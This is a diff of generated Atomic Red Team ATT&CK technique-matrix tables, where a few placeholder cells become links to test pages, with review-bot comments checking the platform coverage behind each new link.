| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
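Review bot: the single replaced row in this hunk (persistence cell Valid Accounts, privilege-escalation cell SysV/Systemd Service) changes only its Command and Control cell, from `Non-Application Layer Protocol [CONTRIBUTE A TEST]` to `[Non-Application Layer Protocol](../../T1095/T1095.md)`; the other eleven cells are unchanged. Together with the T1572 and T1567.002 links in the hunk above, that makes three placeholder-to-link flips in this file and nothing else, which is what a regenerated index should look like, but it is tedious to confirm by eye across 12-column rows. Suggest the PR description (or the generated-docs commit) list the techniques that gained platform coverage, so reviewers can verify the three links against the tests' supported_platforms instead of diffing whole rows; T1095 in particular is a generic technique, so confirm the test behind this link is one that actually runs on this platform.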
+3 -3
@@ -12,9 +12,9 @@
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
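Review bot: the `+3 -3` stat above this hunk matches what the hunk shows: three consecutive rows are replaced, and each differs from its original in one cell only, `Protocol Tunneling` gaining a link to `../../T1572/T1572.md`, `Data from Local System` gaining a link to `../../T1005/T1005.md`, and `Exfiltration Over Web Service: Exfiltration to Cloud Storage` gaining a link to `../../T1567.002/T1567.002.md`. These are the macOS rows (Launchctl, Keychain, Logon Script (Mac), Gatekeeper Bypass), and the T1005 link is the one to look at: in the Linux hunk earlier on this page the `Data from Local System` cell was already linked and untouched, so this cell flipping now means a T1005 test newly declares macos (or a macos-only test was added) in the same change; confirm that is intended rather than a side effect of editing a platform list. The same supported_platforms check applies to the T1572 and T1567.002 links as in the Linux file.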
+3 -3
@@ -13,7 +13,7 @@
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
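Review bot: possible dead link in the only changed row of this hunk: the Execution-column entry for AutoHotKey & AutoIT moves from the CONTRIBUTE A TEST link to a relative link to ../../T1059.010/T1059.010.md, yet the index hunks later in this compare add T1059.010 with atomic_tests: [], so the technique still has no tests. Confirm the doc generator actually emits T1059.010/T1059.010.md for an empty test list; if it does not, the CONTRIBUTE A TEST form was the correct rendering and the matrix should not link it. Because these matrix files come from the [ci skip] generator commits, any fix belongs in the index data or the generator rather than in this table.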
@@ -33,9 +33,9 @@
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Log Enumeration](../../T1654/T1654.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Cloud Administration Command](../../T1651/T1651.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | [Serverless Execution](../../T1648/T1648.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
